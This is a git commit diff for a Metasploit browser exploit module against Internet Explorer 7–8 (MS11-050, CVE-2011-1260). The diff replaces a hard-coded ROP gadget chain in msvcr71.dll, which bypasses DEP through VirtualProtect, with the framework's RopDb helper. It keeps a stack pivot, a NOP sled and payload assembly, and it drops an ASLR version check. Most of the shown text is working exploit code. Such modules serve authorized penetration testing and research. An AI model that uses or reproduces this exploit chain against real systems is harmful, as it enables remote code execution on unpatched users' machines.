Merge branch 'ms11_050_ropdb_update' of https://github.com/wchen-r7/metasploit-framework into wchen-r7-ms11_050_ropdb_update
This commit is contained in:
jvazquez-r7
commit
874fe64343
|
|
@ -1,7 +1,3 @@
|
||||||
##
|
|
||||||
# $Id$
|
|
||||||
##
|
|
||||||
|
|
||||||
##
|
##
|
||||||
# This file is part of the Metasploit Framework and may be subject to
|
# This file is part of the Metasploit Framework and may be subject to
|
||||||
# redistribution and commercial restrictions. Please see the Metasploit
|
# redistribution and commercial restrictions. Please see the Metasploit
|
||||||
|
|
@ -15,19 +11,14 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
Rank = NormalRanking
|
Rank = NormalRanking
|
||||||
|
|
||||||
include Msf::Exploit::Remote::HttpServer::HTML
|
include Msf::Exploit::Remote::HttpServer::HTML
|
||||||
|
include Msf::Exploit::RopDb
|
||||||
include Msf::Exploit::Remote::BrowserAutopwn
|
include Msf::Exploit::Remote::BrowserAutopwn
|
||||||
autopwn_info({
|
autopwn_info({
|
||||||
:ua_name => HttpClients::IE,
|
:ua_name => HttpClients::IE,
|
||||||
:ua_minver => "7.0",
|
:ua_minver => "7.0",
|
||||||
:ua_maxver => "8.0",
|
:ua_maxver => "8.0",
|
||||||
:javascript => true,
|
:javascript => true,
|
||||||
:os_name => OperatingSystems::WINDOWS,
|
:os_name => OperatingSystems::WINDOWS
|
||||||
# If it's IE 8, then we need .net to bypass ASLR
|
|
||||||
:vuln_test => %Q|
|
|
||||||
if (window.os_detect && ua_ver_eq(window.os_detect.ua_version, "8")) {
|
|
||||||
if (/.NET CLR 2\\.0\\.50727/.test(navigator.userAgent)){ is_vuln = true }else{ is_vuln = false }
|
|
||||||
}
|
|
||||||
|,
|
|
||||||
})
|
})
|
||||||
|
|
||||||
def initialize(info={})
|
def initialize(info={})
|
||||||
|
|
@ -46,30 +37,29 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
to bypass DEP (Data Execution Prevention).
|
to bypass DEP (Data Execution Prevention).
|
||||||
},
|
},
|
||||||
'License' => MSF_LICENSE,
|
'License' => MSF_LICENSE,
|
||||||
'Version' => "$Revision$",
|
|
||||||
'Author' =>
|
'Author' =>
|
||||||
[
|
[
|
||||||
'd0c_s4vage', #Discovery, poc
|
'd0c_s4vage', #Discovery, poc
|
||||||
'sinn3r', #ROP (thx corelanc0d3r), Windows 7
|
'sinn3r', #ROP (thx corelanc0d3r), Windows 7
|
||||||
'bannedit', #Windows 7
|
'bannedit' #Windows 7
|
||||||
],
|
],
|
||||||
'References' =>
|
'References' =>
|
||||||
[
|
[
|
||||||
['CVE', '2011-1260'],
|
['CVE', '2011-1260'],
|
||||||
['OSVDB', '72950'],
|
['OSVDB', '72950'],
|
||||||
['MSB', 'MS11-050'],
|
['MSB', 'MS11-050'],
|
||||||
['URL', 'http://d0cs4vage.blogspot.com/2011/06/insecticides-dont-kill-bugs-patch.html'],
|
['URL', 'http://d0cs4vage.blogspot.com/2011/06/insecticides-dont-kill-bugs-patch.html']
|
||||||
],
|
],
|
||||||
'DefaultOptions' =>
|
'DefaultOptions' =>
|
||||||
{
|
{
|
||||||
'EXITFUNC' => 'process',
|
'EXITFUNC' => 'process',
|
||||||
'InitialAutoRunScript' => 'migrate -f',
|
'InitialAutoRunScript' => 'migrate -f'
|
||||||
},
|
},
|
||||||
'Payload' =>
|
'Payload' =>
|
||||||
{
|
{
|
||||||
'Space' => 500,
|
'Space' => 500,
|
||||||
'BadChars' => "\x00\x09\x0a\x0d'\\",
|
'BadChars' => "\x00\x09\x0a\x0d'\\",
|
||||||
'StackAdjustment' => -3500,
|
'StackAdjustment' => -3500
|
||||||
},
|
},
|
||||||
'Platform' => 'win',
|
'Platform' => 'win',
|
||||||
'Targets' =>
|
'Targets' =>
|
||||||
|
|
@ -185,42 +175,16 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
return
|
return
|
||||||
end
|
end
|
||||||
|
|
||||||
#In case we're using ROP, initialize it now
|
|
||||||
code = ''
|
|
||||||
|
|
||||||
if mytarget['Rop']
|
if mytarget['Rop']
|
||||||
# !mona -m msvcr71 rop
|
p = make_nops(44) #Nops
|
||||||
code = [
|
p << "\xeb\x04\xff\xff" #Jmp over the pivot
|
||||||
0x7c376402, # POP EBP # RETN [msvcr71.dll]
|
p << [mytarget.ret].pack('V') #Stack pivot
|
||||||
0x7c376402, # skip 4 bytes [msvcr71.dll]
|
p << payload.encoded
|
||||||
0x7c347f97, # POP EAX # RETN [msvcr71.dll]
|
|
||||||
0xfffff800, # Value to negate, will become 0x00000201 (dwSize)
|
|
||||||
0x7c351e05, # NEG EAX # RETN [msvcr71.dll]
|
|
||||||
0x7c354901, # POP EBX # RETN [msvcr71.dll]
|
|
||||||
0xffffffff,
|
|
||||||
0x7c345255, # INC EBX # FPATAN # RETN [msvcr71.dll]
|
|
||||||
0x7c352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN [msvcr71.dll]
|
|
||||||
0x7c344f87, # POP EDX # RETN [msvcr71.dll]
|
|
||||||
0xffffffc0, # Value to negate, will become 0x00000040
|
|
||||||
0x7c351eb1, # NEG EDX # RETN [msvcr71.dll]
|
|
||||||
0x7c34d201, # POP ECX # RETN [msvcr71.dll]
|
|
||||||
0x7c38b001, # &Writable location [msvcr71.dll]
|
|
||||||
0x7c34b8d7, # POP EDI # RETN [msvcr71.dll]
|
|
||||||
0x7c347f98, # RETN (ROP NOP) [msvcr71.dll]
|
|
||||||
0x7c364802, # POP ESI # RETN [msvcr71.dll]
|
|
||||||
0x7c3415a2, # JMP [EAX] [msvcr71.dll]
|
|
||||||
0x7c347f97, # POP EAX # RETN [msvcr71.dll]
|
|
||||||
0x7c37a151, # ptr to &VirtualProtect() - 0x0EF [IAT msvcr71.dll]
|
|
||||||
0x7c378c81, # PUSHAD # ADD AL,0EF # RETN [msvcr71.dll]
|
|
||||||
0x7c345c30, # ptr to 'push esp # ret ' [msvcr71.dll]
|
|
||||||
].pack("V*")
|
|
||||||
|
|
||||||
code << "\x90"*20 #Nops
|
rop_payload = generate_rop_payload('java', p)
|
||||||
code << "\xeb\x04\xff\xff" #Jmp over the pivot
|
|
||||||
code << [mytarget.ret].pack('V') #Stack pivot
|
|
||||||
end
|
end
|
||||||
|
|
||||||
code << payload.encoded
|
code = (rop_payload) ? rop_payload : payload.encoded
|
||||||
|
|
||||||
# fill the vtable
|
# fill the vtable
|
||||||
vtable = [mytarget['TargetAddr']].pack('V*')
|
vtable = [mytarget['TargetAddr']].pack('V*')
|
||||||
|
|
|
||||||
Loading…
Reference in New Issue